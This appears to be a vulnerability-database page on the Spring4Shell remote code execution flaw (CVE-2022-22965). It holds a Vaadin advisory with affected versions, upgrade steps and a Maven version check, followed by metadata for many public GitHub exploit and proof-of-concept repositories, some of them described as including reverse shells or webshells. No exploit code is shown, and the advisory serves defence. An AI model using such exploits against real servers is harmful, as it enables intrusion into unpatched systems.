A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.
{"vaadin": [{"lastseen": "2022-10-18T17:25:13", "description": "A remote code execution (RCE) vulnerability was discovered in the Spring framework, affecting at least Spring versions 4.x and 5.x. A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. Vaadin applications are not affected by default, but the nature of the vulnerability is more general, and there may be other ways to exploit it. Description A remote code execution (RCE) vulnerability was discovered in the Spring framework, affecting at least Spring versions 4.x and 5.x. A Vaadin Flow application is by default not using the vulnerable Spring MVC or Spring WebFlux features but we still strongly recommend upgrading to a non-vulnerable version of Spring. All Hilla applications always use Spring MVC and should be upgraded. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. If you are unable to upgrade to a non-vulnerable version of Spring Boot, you should apply the workaround described in https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement#vulnerability Affected products and mitigation The following products are not vulnerable by default but can be exploited if Spring MVC or Spring WebFlux features are used in the application: Product version Mitigation Vaadin 7 Apply the workaround described in the Spring blog post. The Vaadin Spring integration is based on Spring 4.x has not received the security fix as it is end-of-life. (Vaadin 7 extended maintenance) Vaadin 8 If you can, upgrade to Spring Boot 2.6.6 and. If you are unable to upgrade to Spring Boot 2.6.6, apply the workaround described in the Spring blog post. (Vaadin 8 extended maintenance) Vaadin 10 If you can, upgrade to Spring Boot 2.6.6. If you are unable to upgrade to Spring Boot 2.6.6, apply the workaround described in the Spring blog post Vaadin 14 Upgrade to Spring Boot 2.5.12 or Spring Boot 2.6.6. Vaadin 22 Upgrade to Spring Boot 2.6.6 Vaadin 23 Upgrade to Spring Boot 2.6.6 Affected Hilla projects and mitigation Hilla-based applications include the Spring dependency and are affected by the vulnerability. Product version Mitigation Hilla 1.0.0 - 1.0.3 Upgrade to Spring Boot 2.6.6 How to check if you are vulnerable? You can check if your Vaadin and Vaadin Flow project for the vulnerable dependency e.g. with Maven: % mvn dependency:tree | grep spring-beans[INFO] | | | \\\\- org.springframework:spring-beans:jar:5.3.16:compile If the version is 5.3.18 or newer or 5.2.20 then you are safe. Otherwise you need to update your project. Fix by using one of the following versions: Update to Spring Framework 5.3.18 and 5.2.20, which contain the fixesUpdate to Spring Boot 2.6.6 and 2.5.12 that depend on Spring Framework 5.3.18 Verify that the version with the fix is in place by re-running the dependency check: % mvn dependency:tree | grep spring-beans[INFO] | | | \\\\- org.springframework:spring-beans:jar:5.3.18:compile Remember to rebuild and redeploy your project. References Vendor advisory: https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement Vendor advisory: https://tanzu.vmware.com/security/cve-2022-22965", "cvss3": {}, "published": "2022-04-01T00:00:00", "type": "vaadin", "title": "Spring Core Remote Code Execution via Data Binding on JDK 9+", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-01T00:00:00", "id": "VAADIN:ADVISORY-2022-04-01", "href": "https://vaadin.com/security/2022-04-01", "cvss": {"score": 0.0, "vector": "NONE"}}], "githubexploit": [{"lastseen": "2022-08-19T20:25:52", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T16:14:36", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-24T08:10:05", "id": "75235F83-D7F4-570F-B966-72159CCBA5CB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T21:02:29", "description": "# CVE-2022-22965\u53ca\u5b98\u65b9\u4fee\u590d\u65b9\u6848\u5df2\u51fa\u3002\u6211\u662f\u4fee\u590d\u65b9\u6848\u51fa\u6765\u4e86\u624d\u653e\u7684\u5de5\u5177\u54c8\uff0c\u5404\u4f4d\u522b\u4e71\u641e\n\n\n Nmap (NSE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-07T00:08:16", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-11-24T20:24:15", "id": "B158F1AE-13DF-5F49-88D5-73B5B6183926", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:59:01", "description": "# CVE-2022-22965\nSpring4Shell (CVE-2022-22965)\n\n## Usage\n\n### 1....", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T12:37:32", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-08-09T21:35:18", "id": "1F4670D2-70D1-5F68-B5BB-2674FB754D26", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:59:04", "description": "# Spring4Shell\n\n\nJust playin...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-07T09:13:11", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-07T09:21:07", "id": "679F3E9E-1555-5391-86FF-CD3D67D80BDD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T21:00:09", "description": "\n\n<p al...", "cvss3": {}, "published": "2022-03-31T15:43:06", "type": "githubexploit", "title": "Exploit for CVE-2022-22965", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T13:15:56", "id": "EF55EC2D-994E-5971-8941-B595536F5992", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2023-01-20T05:33:39", "description": "# CVE-2022-22965\nE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-31T08:21:59", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-01-20T05:27:11", "id": "C4EB8052-6E91-5327-87BE-51E8490B0A4E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T17:24:12", "description": "# Spring4Shell-CVE-2022-22965-POC\n\n```bash\nghost\u327fuchiha:~$ ./exp...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-03T18:15:07", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-01-03T18:15:14", "id": "CAD3F237-9F09-5818-ADE3-DF36E8350D41", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T16:30:02", "description": "# Spring4Shell\nSpring4Shell (CVE-2022-22965) Proof Of Concept wi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-20T11:45:29", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-11-03T13:54:20", "id": "00F5B330-30A9-5854-B811-41A3DCE5A4F8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T16:11:08", "description": "# Spring4Shell\nSpring4Shell (CVE-2022-22965) Proof Of Concept wi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-20T11:45:29", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-11-03T13:54:20", "id": "F95C4865-A269-5A59-9AD3-3D000443E6FF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T15:40:40", "description": "# CVE-2022-22965 poc\nCVE-2022-22965 poc including reverse-shell ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T19:19:52", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-28T11:37:34", "id": "0018F9FA-176E-52D1-B790-5C67C302BC74", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T19:59:50", "description": "\u9776\u673a\n```bash\ndocker run -itd -p 80:8080 vulfocus/spring-core-rce-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-08T13:45:35", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-02-07T02:30:57", "id": "6A9484BA-BE10-5232-91F4-678892E7E6DD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T16:42:56", "description": "# Telstra-Cybersecurity-Virtual-Experience-Program\n\nI participat...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-31T12:04:25", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-10-28T08:14:29", "id": "FACAC290-D83E-5B87-B534-640F9C566696", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:59:13", "description": "# Spring4shell_behinder\n\n## \u8fd9\u662f\u4ec0\u4e48?\n\n\u4e00\u4e2a\u9488\u5bf9spring4shell\u6f0f\u6d1e(CVE-2022-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-07T03:50:14", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-11-14T15:58:53", "id": "7883CC8E-9B35-5C0F-AE2E-271FAC17648B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:59:14", "description": "# Spring4Shell-CVE-2022-22965.py\nScript to check for Spring4Shel...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-09T08:40:49", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-07-12T02:19:13", "id": "F09161EA-B10D-5DBF-B548-6F9BE7EE20B2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T21:01:10", "description": "# Spring-Core-RCE Spring Framework \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff08CVE-2022-22965\uff09\nSpri...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T09:13:54", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-28T11:37:37", "id": "A0648F78-7165-5CA8-82DC-B34350E2DDC6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T21:01:23", "description": "Simple Spring4Shell POC \r\n-----------------------\r\n\r\n* Check if ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:09:58", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-04T14:13:42", "id": "397046C4-338E-5CCC-AD0A-687CA3551B7C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T21:01:33", "description": "# irule-cve-2022-22965\n\nThis is a basic iRule to provide some mi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-06T02:17:36", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-02-11T20:16:21", "id": "A8866ED4-A944-571F-8135-6138A2E9B568", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T21:02:29", "description": "# Safer_PoC_CVE-2022-22965\nA Safer PoC for CVE-2022-22965 (Sprin...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T16:58:56", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 